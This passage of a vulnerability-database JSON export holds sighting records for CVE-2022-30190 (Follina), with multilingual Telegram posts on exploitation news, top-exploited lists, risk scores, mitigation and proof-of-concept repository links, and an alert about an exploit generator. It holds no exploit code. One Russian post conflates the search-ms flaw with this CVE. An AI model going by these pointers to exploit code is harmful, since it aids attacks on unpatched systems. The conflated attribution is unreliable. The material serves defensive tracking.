\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413\n - \u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 PoC Foolina (\u043d\u0430 \u0432\u0441\u044f\u043a\u0438\u0439): https://github.com/JMousqueton/PoC-CVE-2022-30190", "creation_timestamp": "2024-03-01T21:36:29.000000Z"}, {"uuid": "380edc6a-f074-454e-8992-d047edf8b892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/package_security/17", "content": "\u200b\ud83c\udfc6 \u0418\u0442\u043e\u0433\u0438 \u0433\u043e\u0434\u0430\n\n\u041d\u0430\u0441\u0442\u0430\u043b\u043e \u0432\u0440\u0435\u043c\u044f \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u0435.\n2\u043a22 \u0433\u043e\u0434 \u043d\u0430\u043a\u043e\u043d\u0435\u0446-\u0442\u043e 
\u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u043a \u043a\u043e\u043d\u0446\u0443, \u0430 \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043f\u043e\u0440\u0430 \u043f\u043e\u0434\u0432\u043e\u0434\u0438\u0442\u044c \u0438\u0442\u043e\u0433\u0438.\n\n\u0423 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u043e\u0432, \u043a\u0430\u043a \u0438 \u0432\u0441\u0435\u0433\u0434\u0430, \u0438\u0442\u043e\u0433\u0438 \u0441\u0432\u043e\u0438. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u0435\u0440\u0436\u0438\u0442\u0435 \u0422\u041e\u041f-10 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 2022 \u0433\u043e\u0434\u0443 \u043f\u043e \u0432\u0435\u0440\u0441\u0438\u0438 Cyber Threat Intelligence:\n\n1. Follina (CVE-2022-30190) \n\n2. Log4Shell (CVE-2021-44228) \n\n3. Spring4Shell (CVE-2022-22965) \n\n4. F5 BIG-IP (CVE-2022-1388) \n\n5. Google Chrome zero-day (CVE-2022-0609) \n\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882) \n\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040) \n\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352) \n\n9. Atlassian Confluence RCE flaw (CVE-2022-26134) \n\n10. Zyxel RCE vulnerability (CVE-2022-30525)\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u043e\u0441\u0442\u043e\u0440\u043e\u0436\u043d\u044b, \u0431\u0435\u0440\u0435\u0433\u0438\u0442\u0435 \u0441\u0435\u0431\u044f \u0438 \u0432\u0430\u0448\u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u044b.\nP.S. 
\u041d\u0438\u0436\u0435 \u0435\u0441\u0442\u044c \u043f\u0438\u043a\u0447\u0430 \u0441 \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u044b\u043c\u0438 \u0438\u043a\u043e\u043d\u043a\u0430\u043c\u0438\n\n#\u041f\u043e\u043b\u0435\u0437\u043d\u043e\u0435\n\n\u041f\u0430\u043a\u0435\u0442 \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438", "creation_timestamp": "2022-12-16T15:56:36.000000Z"}, {"uuid": "796a807e-345d-401c-a499-9d9987645d0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/kasperskyb2b/786", "content": "\u2705 \u0413\u043b\u0430\u0432\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: \u043e\u0442\u0447\u0451\u0442 CISA \u0438 \u0438\u0445 \u0430\u043d\u0433\u043b\u043e\u044f\u0437\u044b\u0447\u043d\u044b\u0445 \u0441\u043e\u044e\u0437\u043d\u0438\u043a\u043e\u0432\n\n\u0412 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0433\u043e\u0434\u0430 \u0432\u044b\u0445\u043e\u0434\u044f\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u043e\u0442\u0447\u0451\u0442\u043e\u0432, \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c. 
\u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0442 2022 \u0433\u043e\u0434, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u2014 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 12 \u043c\u0435\u0441\u044f\u0446\u0435\u0432, \u043d\u043e \u0432 \u043b\u044e\u0431\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043e\u043d\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u043e\u0443\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b \u0438 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u043d\u044b. \u041d\u0430\u0447\u043d\u0451\u043c \u0441 \u0431\u043e\u043b\u044c\u0448\u043e\u0433\u043e \u043e\u0442\u0447\u0451\u0442\u0430 \u00ab\u043f\u044f\u0442\u0438\u0433\u043b\u0430\u0437\u044b\u0445\u00bb, \u043f\u043e\u0441\u0432\u044f\u0449\u0451\u043d\u043d\u043e\u0433\u043e \u0433\u043b\u0430\u0432\u043d\u044b\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \n\n\u0413\u043b\u0430\u0432\u043d\u044b\u0439 \u0432\u044b\u0432\u043e\u0434 \u043d\u0435 \u043d\u043e\u0432 \u2014 \u0441\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f 0day \u0438\u043b\u0438 1day. 
\u042d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0433\u043e\u0434 \u0438\u043b\u0438 \u0434\u0432\u0430, \u0438\u043c\u0435\u044e\u0449\u0438\u0435 PoC \u043d\u0430 Github, \u0434\u0430\u0432\u043d\u043e \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0435 \u043f\u0430\u0442\u0447\u0430\u043c\u0438, \u043d\u043e \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432\u0441\u0451 \u0440\u0430\u0432\u043d\u043e \u043d\u0435 \u043b\u0438\u043a\u0432\u0438\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0442\u044b\u0441\u044f\u0447\u0430\u043c\u0438 \u0441\u0438\u0441\u0430\u0434\u043c\u0438\u043d\u043e\u0432 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.  \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043d\u0435 \u043d\u0440\u0430\u0432\u0438\u0442\u0441\u044f \u0442\u0440\u0443\u0434\u043d\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u043d\u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u0447\u0438\u0442\u0430\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445, \u0438\u043c\u0435\u044e\u0449\u0438\u0445 \u0432\u0441\u0435\u043c\u0438\u0440\u043d\u043e\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0432\u043e \u0432\u0441\u0435\u0445 \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u044f\u0445.\n\n\u0422\u043e\u043f-12 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439: CVE-2018-13379 \u0432 Fortinet SSL VPN, \u0442\u0440\u0438 CVE 2021 \u0433\u043e\u0434\u0430, \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0435 ProxyShell, CVE-2021-40539 \u0432 Zoho ManageEngine, CVE-2021-26084 \u0438 -26134 \u0432 Confluence, CVE-2021-44228 Log4Shell, CVE-2022-22954 \u0438 -22960 \u0432 VMWare, CVE-2022-1388 \u0432 F5 BIG-IP,  
CVE-2022-30190 \u0432 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 \u0442\u0435\u0445\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 Windows, MSDT.\n\n\u0415\u0449\u0451 \u0442\u0440\u0438 \u0434\u0435\u0441\u044f\u0442\u043a\u0430 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u2014 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u043c \u043e\u0442\u0447\u0451\u0442\u0435 (\u0430\u043d\u0433\u043b). \u0422\u0430\u043c \u0436\u0435 \u0434\u0430\u043d\u044b \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c \u043f\u043e \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. 
\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u0440\u0430\u0437\u0434\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u044b:\n\n\ud83d\udd18\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0435\u0439\n\ud83d\udd18\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439\n\ud83d\udd18\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0437\u0430\u0449\u0438\u0442\u044b \u0438 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u0430\u044f \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0430 \u0441\u0435\u0442\u0438\n\ud83d\udd18\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #\u0441\u043e\u0432\u0435\u0442\u044b @\u041f2\u0422", "creation_timestamp": "2023-08-07T10:20:52.000000Z"}, {"uuid": "1ee52878-4384-4108-a270-fe5ef7bf490e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BleepingComputer/12590", "content": "Latest news and stories from BleepingComputer.com\nXFiles info-stealing malware adds support for Follina delivery\n\nThe XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers. 
[...]", "creation_timestamp": "2022-06-30T14:49:53.000000Z"}, {"uuid": "06f58099-fc14-4ee5-82e3-ae15b1733243", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2478", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMitigation for CVE-2022-30190\nURL\uff1ahttps://github.com/k508/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-10T00:25:13.000000Z"}, {"uuid": "b57897e8-9c5d-490a-b73d-df79649096b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/Al5s1pu9DlCNMnH7rJt2q5NFKP_tt6i0TJLpRuR3HfdnDhA", "content": "", "creation_timestamp": "2022-12-05T04:24:48.000000Z"}, {"uuid": "36636268-e5eb-430d-a52f-f85f846f2422", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/76482", "content": "BSidesKC 2022 \u2013 Grant Shanklin\u2019s \u2018Trouble With The Troubleshooter; A Primer On CVE-2022-30190\u2019\n\nhttps://ift.tt/CemSbOE", "creation_timestamp": "2022-11-18T22:46:41.000000Z"}, {"uuid": "b47dabe1-b6fb-4d25-962f-5515b60d08aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/53234", "content": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction\n\nhttps://ift.tt/Wjha3VU", "creation_timestamp": "2022-06-06T10:26:35.000000Z"}, {"uuid": "da579da7-39b3-4c9e-8235-f410be24c2d5", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/53233", "content": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction\n\nhttps://ift.tt/Wjha3VU", "creation_timestamp": "2022-06-06T10:26:33.000000Z"}, {"uuid": "7a010773-5369-4fb9-867e-ef40e4ad1f3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/ctinow/52923", "content": "Malware \u2013 new OFFICE MSDT based attack CVE-2022-30190\n\nhttps://ift.tt/EP42lVq", "creation_timestamp": "2022-05-31T16:31:42.000000Z"}, {"uuid": "efea7d6f-7a5b-42f4-8ed5-5790f2d2daef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/1161", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 317 entries related to CVE-2022-30190. 
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-04T08:56:35.000000Z"}, {"uuid": "846c29e0-b64a-4f63-bd37-45f15083ed5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/i9m6HRrazEdv2yYTfO5Vg9Qrfq03-5aNzHdOckuUq5U3HrY", "content": "", "creation_timestamp": "2023-07-17T14:40:27.000000Z"}, {"uuid": "1cdd15ce-d096-4e5d-9fed-ad739ec8394c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/suSVZ8gjh9CeURgOUMEZq2Z7fyo2iknJlY7RsYX9Hr2cvtw", "content": "", "creation_timestamp": "2023-01-20T07:08:40.000000Z"}, {"uuid": "4fa9fc92-1642-468d-9448-62a0e14b761f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/177", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 308 entries related to CVE-2022-30190. 
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.971670000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-13T21:02:30.000000Z"}, {"uuid": "961cb6bf-2893-4117-87b5-15d528134838", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/VXX-UF1kIj_skcNHogz47Ob3F5rZG8tp8QVvD5iXH84fvqE", "content": "", "creation_timestamp": "2022-05-31T10:14:55.000000Z"}, {"uuid": "bcd6cfb0-950c-4773-8d10-0b1b937a03b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/637", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 315 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-28T12:29:25.000000Z"}, {"uuid": "08e9c547-d5a9-4392-949e-6edfc61c4ab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/wireshark_hacking/771", "content": "Thorough MSDT 0-Day CVE-2022-30190 POC 'Follina'", "creation_timestamp": "2022-11-02T06:14:32.000000Z"}, {"uuid": "a36b01df-bcd7-40d8-b5d3-cbf59ca39e50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/886", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 317 entries related to CVE-2022-30190. 
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-02T03:03:57.000000Z"}, {"uuid": "a8b5c22e-6431-4dfa-9b81-77846de69edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/arpsyndicate/754", "content": "#ExploitObserverAlert\n\nCVE-2022-30190\n\nDESCRIPTION: Exploit Observer has 314 entries related to CVE-2022-30190. Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\nFIRST-EPSS: 0.973000000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-29T14:42:00.000000Z"}, {"uuid": "660e8fb1-e175-41d0-9fd8-e08b4415a060", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/PWf_vvG2Dns7xyv3p7orI9OcjbHcz0BpT-pBWPuIwftS1-g", "content": "", "creation_timestamp": "2025-03-02T16:00:09.000000Z"}, {"uuid": "b029f195-91fd-4226-9588-39bda60ed9e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/PFczZxou3M8bxtA_ogzzcgh7g-AmtdGPjCcJVMEUDXCS9Y4", "content": "", "creation_timestamp": "2025-04-08T17:00:08.000000Z"}, {"uuid": "2f68a12c-cd12-4a9c-bc70-018e615a7365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/Wo1sKu5WvLAnXgcdD3UnX1YZbL6JSQKu1r91lLadtAvpOaI", "content": "", "creation_timestamp": "2025-02-07T10:00:05.000000Z"}, {"uuid": "29bd9245-99d0-4139-8ea2-6735798a35a4", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/breachdetector/93760", "content": "\u26a0 Detectada filtraci\u00f3n \u26a0\n{\n  \"site\": \"Sinister.ly\",\n  \"Threat Actor\": \"hacxx\",\n  \"Content\": \"Hacxx MSDT 0-Day CVE-2022-30190 Exploit Generator\",\n  \"Detection Date\": \"06 Jun 2022 16:01\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 Data Leak monitoring system\ud83d\udd39", "creation_timestamp": "2022-06-06T16:03:49.000000Z"}, {"uuid": "a55b9f11-e98a-4b83-8161-b293201f634c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/nemeZ1da_ru/5466", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u043e\u0432\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb (Windows Search) \u2014 CVE-2022-30190. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u043e\u043a\u043d\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u0435\u0441\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c. 
\u0410 \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0435 \u043e\u043a\u043d\u043e, \u0436\u0435\u0440\u0442\u0432\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 Microsoft \u2014 MSDT, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u044b. \u041d\u043e \u0435\u0441\u043b\u0438 \u043f\u043e\u0434\u0441\u0443\u043d\u0443\u0442\u044c \u0435\u043c\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office, \u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0441\u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URI-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00absearch-ms\u00bb, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c \u0438 HTML-\u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u043d\u0430 
\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435. \u0422\u0430\u043a\u0438\u0435 \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u043d\u043e \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u0435\u0442 \u0438\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438. \u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u0449\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b, \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 